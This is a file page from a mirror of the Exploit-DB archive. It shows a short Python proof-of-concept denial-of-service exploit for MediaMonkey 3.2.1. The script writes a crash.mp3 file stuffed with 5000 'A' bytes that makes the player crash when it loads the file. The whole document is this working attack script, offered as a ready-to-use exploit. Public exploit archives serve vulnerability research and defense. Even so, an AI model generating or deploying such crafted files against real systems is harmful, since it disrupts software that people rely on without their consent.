exploit-db-mirror/exploits/windows/dos/14555.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
255 B
Python
Executable file

#Mediamonkey v. 3.2.1.1297 DOS POC
#vulnerble application link http://www.mediamonkey.com/trialpay
#tested on XP SP2/3
#!/usr/bin/python
filename = "crash.mp3"
junk = "\x41" * 5000
textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()